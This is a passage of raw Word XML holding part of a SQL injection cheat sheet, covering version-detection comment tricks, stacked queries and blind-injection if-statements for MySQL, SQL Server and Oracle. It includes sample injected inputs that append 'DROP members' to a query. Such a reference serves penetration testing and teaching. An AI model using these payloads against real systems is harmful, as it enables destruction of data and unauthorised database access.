          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>/*!</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>32302</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t> 10*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AB5206" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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ID: </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>10</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You will get the </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>same response</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> if MySQL version is higher than </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>3.23.02</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11769CD4" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>32302</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t> 1/0, */ 1 FROM tablename</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Will throw a </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>division by 0 error </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>if MySQL version is higher than</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>3.23.02</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6B3308"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bookmarkStart w:id="6" w:name="StackingQueries"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Stacking Queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41916E5B"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t>Executing more than one query in one transaction</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>. This is very useful in every injection point, especially in SQL Server back ended applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03437899" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> (S)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 FROM members; DROP members--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E762966"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Ends a query and starts a new one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261F0128"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7" w:name="LangDbFigure"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Language / Database Stacked Query Support Table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7C1082"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t>green:</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> supported, </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>dark gray:</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> not supported, </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>light gray: </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>unknown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48920ED0" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EAE4110" wp14:editId="7E030496">
            <wp:extent cx="4762500" cy="1323975"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="2" name="Picture 2" descr="SQL Injection Cheat she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Injection Cheat shee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323975"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="264F1542"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bookmarkStart w:id="8" w:name="AboutMySQLandPHP"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>About MySQL and PHP;</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To clarify some issues; </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>PHP - MySQL doesn't support stacked queries</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>, Java doesn't support stacked queries (</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>I'm sure for ORACLE, not quite sure about other databases</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>). </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Normally MySQL supports stacked queries but because of database layer in most of the configurations it's not possible to execute a second query in PHP-MySQL applications or maybe MySQL client supports this, not quite sure. Can someone clarify?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EF5AB2" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="150" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="StackedSamples"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Stacked SQL Injection Attack Samples</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737730B5" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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ID: </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>10;DROP members --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E948BFC" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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 FROM products WHERE id = 10; DROP members--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CB22AE"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This will run </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>DROP members</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> SQL sentence after normal SQL Query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FE48C7"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bookmarkStart w:id="10" w:name="IfStatements"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>If Statements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703AAC6B"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Get response based on an if statement. This is </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>one of the key points of Blind SQL Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>, also can be very useful to test simple stuff blindly and </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>accurately</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F57292"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11" w:name="MySQLIf"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>MySQL If Statement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04391299" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>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IF(</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>condition</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>true-part</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>false-part</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>) </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>(M)</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:br/>
        <w:t>SELECT IF(1=1,'true','false')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8B3CF8"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12" w:name="SQLServerIf"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>SQL Server If Statement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AEB137" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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IF </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>condition</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>true-part</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t> ELSE </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>false-part</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> (S)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IF (1=1) SELECT 'true' ELSE SELECT 'false'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD14A85"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Oracle If Statement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6424AB5A" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>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BEGIN</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:br/>
        <w:t>IF </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>condition</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t> THEN </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>true-part</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>; ELSE </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>false-part</w:t>
      </w:r>
